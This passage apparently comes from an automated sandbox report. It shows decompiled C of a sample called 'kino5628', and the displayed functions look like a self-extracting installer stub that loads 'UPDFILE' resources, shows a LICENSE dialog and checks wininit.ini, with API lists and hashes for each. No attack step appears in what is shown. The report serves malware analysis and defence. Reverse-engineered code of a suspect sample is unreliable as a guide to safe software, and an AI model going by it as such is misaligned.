										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E008E65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E008E1680(_t65, E008E17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E008E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x008e2aac
0x008e2ab7
0x008e2abc
0x008e2abe
0x008e2ac3
0x008e2ac6
0x008e2ac9
0x008e2ace
0x008e2ae6
0x008e2bdc
0x008e2bdc
0x008e2be0
0x00000000
0x00000000
0x008e2af2
0x008e2afc
0x008e2b00
0x008e2b05
0x008e2b05
0x008e2b0b
0x008e2bca
0x008e2bd1
0x008e2b11
0x008e2b18
0x008e2b26
0x008e2b99
0x008e2bc8
0x00000000
0x00000000
0x008e2b9b
0x008e2bae
0x008e2bb3
0x008e2bb5
0x008e2bb5
0x008e2bb8
0x008e2bb8
0x008e2bba
0x008e2bbb
0x00000000
0x008e2bb8
0x008e2b28
0x008e2b2e
0x008e2b33
0x008e2b39
0x008e2b3c
0x008e2b3c
0x008e2b3e
0x008e2b3f
0x008e2b55
0x008e2b5d
0x008e2b64
0x008e2b64
0x008e2b7a
0x008e2b7f
0x008e2b81
0x008e2b81
0x008e2b84
0x008e2b84
0x008e2b86
0x008e2b87
0x008e2bbf
0x008e2bc1
0x008e2bc1
0x008e2b26
0x008e2bda
0x008e2bda
0x008e2be6
0x008e2be6
0x008e2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 008E2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 008E2AF2
CharNextA.USER32(?), ref: 008E2B12
CharUpperA.USER32 ref: 008E2B1E
CharPrevA.USER32(?,?), ref: 008E2B55
CharNextA.USER32(?), ref: 008E2BD4

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: bd58b44743a2c1ca7192d82a0c248ce5d31b4aad56f904ba7c67a96ff4040d7f
Instruction ID: 97896959446ec951e0acc70a8e3a45163a1b057e92a25ec2901dd37504c3bbef
Opcode Fuzzy Hash: bd58b44743a2c1ca7192d82a0c248ce5d31b4aad56f904ba7c67a96ff4040d7f
Instruction Fuzzy Hash: 954112345042C59EDB199F248C44AFD7BADFF97320F04409AE8C2D7202DB345E868B61

Uniqueness

Uniqueness Score: -1.00%

Function 008E43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E008E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x8e8004; // 0xaf179a30
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E008E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x008e43d0
0x008e43d8
0x008e43df
0x008e43e6
0x008e43ec
0x008e43f1
0x008e4400
0x008e4403
0x008e440b
0x008e4420
0x008e4429
0x008e4437
0x008e4444
0x008e4447
0x008e444d
0x008e4454
0x008e445b
0x008e4460
0x008e4461
0x008e4467
0x008e446f
0x008e4473
0x008e4473
0x008e4463
0x008e4463
0x008e4463
0x008e447a
0x008e4481
0x008e4484
0x008e448a
0x008e4492
0x008e4496
0x008e4496
0x008e4486
0x008e4486
0x008e4486
0x008e44b8

APIs

GetWindowRect.USER32(?,?), ref: 008E43F1
GetWindowRect.USER32(00000000,?), ref: 008E440B
GetDC.USER32(?), ref: 008E4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 008E442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 008E443A
ReleaseDC.USER32(?,00000000), ref: 008E4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008E44A2

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: a371aa7f92f46be73a6b1bd010bd12528b7df02413e1cf950698f05e42c0b586
Instruction ID: 7df4180275b4b7849b22f4a6a70a8875c720be0da21d82d11e177dec5e977b3d
Opcode Fuzzy Hash: a371aa7f92f46be73a6b1bd010bd12528b7df02413e1cf950698f05e42c0b586
Instruction Fuzzy Hash: A8314D32E00159AFCB18CFB8DD889EEBBB5FB89310F154169F806F7280DA306D058B64

Uniqueness

Uniqueness Score: -1.00%

Function 008E6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E008E6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x8e8004; // 0xaf179a30
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E008E171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x8e9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x8ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E008E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E008E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x008e6298
0x008e62a0
0x008e62a7
0x008e62ad
0x008e62af
0x008e62bb
0x008e62c3
0x008e62c4
0x008e633b
0x008e633b
0x008e6345
0x008e634d
0x00000000
0x00000000
0x008e62da
0x008e62de
0x008e635f
0x008e6369
0x008e62e0
0x008e62e0
0x008e62e0
0x008e62e3
0x008e62e5
0x008e62e5
0x008e62e8
0x008e62e8
0x008e62ea
0x008e62eb
0x008e62ef
0x008e62f1
0x008e62f3
0x008e6302
0x008e6308
0x008e630d
0x008e6314
0x008e6314
0x008e6316
0x008e6319
0x008e6355
0x008e6357
0x008e631b
0x008e631b
0x008e6331
0x008e6334
0x008e6339
0x00000000
0x008e6339
0x008e6319
0x008e636b
0x008e637d
0x008e637d
0x00000000

APIs

Part of subcall function 008E171E: _vsnprintf.MSVCRT ref: 008E1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008E51CA,00000004,00000024,008E2F71,?,00000002,00000000), ref: 008E62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008E51CA,00000004,00000024,008E2F71,?,00000002,00000000), ref: 008E62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008E51CA,00000004,00000024,008E2F71,?,00000002,00000000), ref: 008E631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 008E6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008E51CA,00000004,00000024,008E2F71,?,00000002,00000000), ref: 008E6357

Strings

UPDFILE%lu, xrefs: 008E62B3, 008E6329

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 8a8bf15fe277f0ec53e5581eafd70cbcff5e7aaadcf6958a13de5434cfce5c6b
Instruction ID: 0fadac6354b24385153255b99817cec594eb21941660726e20083dadc50c195c
Opcode Fuzzy Hash: 8a8bf15fe277f0ec53e5581eafd70cbcff5e7aaadcf6958a13de5434cfce5c6b
Instruction Fuzzy Hash: F0213735A00259ABCB149F66CC899FFBB78FF46B54B100129F902E7301EB359D128BE1

Uniqueness

Uniqueness Score: -1.00%

Function 008E681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E008E681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x8e8004; // 0xaf179a30
				_v8 = _t19 ^ _t44;
				_t41 =  *0x8e81d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x8e81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x8e81d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x8e1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E008E66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x8e81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E008E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x008e681f
0x008e682a
0x008e6831
0x008e6836
0x008e683c
0x008e683e
0x008e6848
0x008e6851
0x008e685d
0x008e6864
0x008e6876
0x008e693a
0x008e693a
0x008e687c
0x008e687e
0x008e6885
0x00000000
0x008e68d6
0x008e68f4
0x008e6900
0x008e6902
0x008e690a
0x00000000
0x008e690c
0x008e690c
0x008e691c
0x00000000
0x008e691e
0x008e6924
0x008e692b
0x008e6932
0x00000000
0x00000000
0x00000000
0x008e692b
0x008e691c
0x008e690a
0x008e6885
0x008e6876
0x008e6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008E686E
GetSystemMetrics.USER32(0000004A), ref: 008E68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008E68CC
RegQueryValueExA.ADVAPI32(?,008E1140,00000000,?,?,0000000C), ref: 008E68F4
RegCloseKey.ADVAPI32(?), ref: 008E6902

Part of subcall function 008E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,008E691A), ref: 008E6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 008E68C2

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 3bb0aac8e0a6af64f8042892bf0c3620895b7302bf34dc88b5bf8a992c031e81
Instruction ID: 69b9ca96096d202be66763800a87063171ab144deda6c9f2970067d65a289361
Opcode Fuzzy Hash: 3bb0aac8e0a6af64f8042892bf0c3620895b7302bf34dc88b5bf8a992c031e81
Instruction Fuzzy Hash: 34318431A40299DFDB21DB22CC84BAE7B78FB567A4F000195E94DEA141EB309D95CF52

Uniqueness

Uniqueness Score: -1.00%

Function 008E3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E008E468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x8e8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E008E468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x8e8d4c, "<None>") == 0) {
							LocalFree( *0x8e8d4c);
							L9:
							 *0x8e9124 = 0;
							return 1;
						}
						_t9 = E008E6517(_t19, 0x7d1, 0, E008E3100, 0, 0);
						LocalFree( *0x8e8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x8e9124 = 0x800704c7;
						L2:
						return 0;
					}
					E008E44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x8e8d4c);
					 *0x8e9124 = 0x80070714;
					goto L2;
				}
				E008E44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x8e9124 = E008E6285();
				goto L2;
			}

0x008e3a46
0x008e3a57
0x008e3a5d
0x008e3a63
0x008e3a6a
0x008e3a91
0x008e3a9a
0x008e3ad8
0x008e3b13
0x008e3b19
0x008e3b1b
0x00000000
0x008e3b21
0x008e3ae7
0x008e3af4
0x008e3afc
0x00000000
0x00000000
0x008e3afe
0x008e3a87
0x00000000
0x008e3a87
0x008e3aa8
0x008e3ab3
0x008e3ab9
0x00000000
0x008e3ab9
0x008e3a78
0x008e3a82
0x00000000

APIs

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008E2F64,?,00000002,00000000), ref: 008E3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 008E3AB3

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Part of subcall function 008E6285: GetLastError.KERNEL32(008E5BBC), ref: 008E6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 008E3AD0
LocalFree.KERNEL32 ref: 008E3B13

Part of subcall function 008E6517: FindResourceA.KERNEL32(008E0000,000007D6,00000005), ref: 008E652A
Part of subcall function 008E6517: LoadResource.KERNEL32(008E0000,00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008E6538
Part of subcall function 008E6517: DialogBoxIndirectParamA.USER32(008E0000,00000000,00000547,008E19E0,00000000), ref: 008E6557
Part of subcall function 008E6517: FreeResource.KERNEL32(00000000,?,?,008E2EE8,00000000,008E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008E6560

LocalFree.KERNEL32(00000000,008E3100,00000000,00000000), ref: 008E3AF4

Strings

LICENSE, xrefs: 008E3A46
<None>, xrefs: 008E3AC5

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 8284a65b904d866f808427067cf8e4f625752bd94424d67e7a3c2c2b22534c0e
Instruction ID: 983e015fbe4244bd076e907f36e8bce7502a052c0d9428e1481b53c8094c8abb
Opcode Fuzzy Hash: 8284a65b904d866f808427067cf8e4f625752bd94424d67e7a3c2c2b22534c0e
Instruction Fuzzy Hash: 0A11A5303016C1EBD724AF37AC4DE1B3AA9FBD7B50B10402EB546DF2A1EA798C009625

Uniqueness

Uniqueness Score: -1.00%

Function 008E24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008E24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x8e8004; // 0xaf179a30
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E008E658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E008E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x008e24e0
0x008e24eb
0x008e24f2
0x008e24f7
0x008e2504
0x008e250e
0x008e251d
0x008e252c
0x008e2541
0x008e2546
0x008e2553
0x008e2555
0x008e2555
0x008e2546
0x008e256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 008E2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 008E252C
_lopen.KERNEL32(?,00000040), ref: 008E253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 008E254C
_lclose.KERNEL32(00000000), ref: 008E2555

Strings

wininit.ini, xrefs: 008E2510

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 189d4e9fb9954b4eb4dd456881c7b220c37c155dab185837e1fec1ab478af028
Instruction ID: 906dbca8301f0908bd0ba09f0dc97cc0317174b9af3968d0b2e5cb03054faba2
Opcode Fuzzy Hash: 189d4e9fb9954b4eb4dd456881c7b220c37c155dab185837e1fec1ab478af028
Instruction Fuzzy Hash: 9901F532600558A7C720DB6A9C4CEDF7B7CFB82B60F000154FA59D7190DE749E41CA91

Uniqueness

Uniqueness Score: -1.00%

Function 008E36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008E36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x8e8004; // 0xaf179a30
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x8e8184 = 1;
						 *0x8e8180 = 1;
						L13:
						 *0x8e9a40 = _t119;
						L14:
						__eflags =  *0x8e8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E008E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E008E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x8e8a38 & 0x00000001;
											if(( *0x8e8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E008E681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E008E67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E008E28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
